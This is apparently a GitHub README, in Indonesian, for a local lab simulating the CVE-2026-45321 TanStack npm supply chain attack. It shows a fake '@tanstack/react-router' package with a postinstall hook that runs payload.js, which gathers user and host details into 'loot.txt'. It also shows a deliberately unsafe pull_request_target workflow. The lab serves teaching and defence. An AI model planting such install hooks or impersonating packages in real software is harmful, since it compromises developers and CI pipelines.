renewablehacking/CVE-2026-45321-Tanstack

# Simulasi Supply Chain Attack — CVE-2026-45321 (TanStack) ## Disclaimer Project ini dibuat hanya untuk: * pembelajaran keamanan siber, * riset defensive security, * simulasi local lab, * memahami konsep supply chain attack. Jangan gunakan project ini untuk: * menyerang sistem nyata, * mencuri credential, * malware deployment, * unauthorized access, * atau aktivitas ilegal lainnya. # Deskripsi Lab ini mensimulasikan konsep dasar dari insiden: * CVE-2026-45321 * TanStack npm Supply Chain Compromise * GitHub Actions CI/CD Abuse * npm Lifecycle Script Execution Simulasi dilakukan secara lokal dan aman tanpa: * credential stealing nyata, * token exfiltration, * atau kompromi layanan pihak ketiga. # Struktur Lab lab/ ├── fake-repo/ # Simulasi repository target ├── attacker-package/ # Simulasi package malicious └── victim-project/ # Simulasi korban # Cara Kerja Simulasi Attacker Package ↓ npm install ↓ postinstall script berjalan ↓ payload.js dieksekusi otomatis ↓ Korban terkena install-time execution # Konsep yang Dipelajari * npm lifecycle hooks * install-time arbitrary code execution * supply chain attack * CI/CD trust boundary * malicious npm package * postinstall abuse * dependency compromise # Instalasi ## 1. Clone Repository git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git cd CVE-2026-45321-Tanstack # Setup Attacker Package ## 2. Masuk ke Folder Attacker Package cd attacker-package ## 3. Install Dependency npm install ## 4. Build Tarball Package npm pack Hasil: tanstack-react-router-1.169.5.tgz # Simulasi Victim ## 5. Masuk ke Victim Project cd ../victim-project ## 6. Install Malicious Package npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts # Output Jika berhasil maka akan muncul: === MALICIOUS PAYLOAD EXECUTED === dan file: loot.txt akan dibuat secara otomatis. # Contoh payload.js const os = require('os'); const fs = require('fs'); console.log("=== MALICIOUS PAYLOAD EXECUTED ==="); const info = ` USER=${process.env.USER} HOST=${os.hostname()} PLATFORM=${os.platform()} `; console.log(info); fs.writeFileSync("loot.txt", info); # Contoh package.json { "name": "@tanstack/react-router", "version": "1.169.5", "scripts": { "postinstall": "node payload.js" } } # Simulasi CI/CD Project ini juga dapat digunakan untuk memahami: * GitHub Actions * pull_request_target * CI/CD privilege boundary * dependency execution Contoh workflow: name: CI on: pull_request_target: jobs: build: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - run: npm install # Hubungan dengan CVE-2026-45321 | Simulasi Lab | Dunia Nyata | | ---------------- | ---------------------------- | | attacker-package | compromised TanStack package | | payload.js | malicious installer | | postinstall | lifecycle hook abuse | | victim-project | developer/CI korban | | fake-repo | GitHub Actions pipeline | # Referensi * https://nvd.nist.gov/vuln/detail/CVE-2026-45321 * https://tanstack.com/blog/npm-supply-chain-compromise-postmortem * https://docs.npmjs.com/cli/v10/using-npm/scripts * https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions # Educational Purpose Only Lab ini dibuat untuk meningkatkan awareness mengenai: * keamanan supply chain, * keamanan dependency, * keamanan CI/CD, * dan defensive security research.

标签：自定义脚本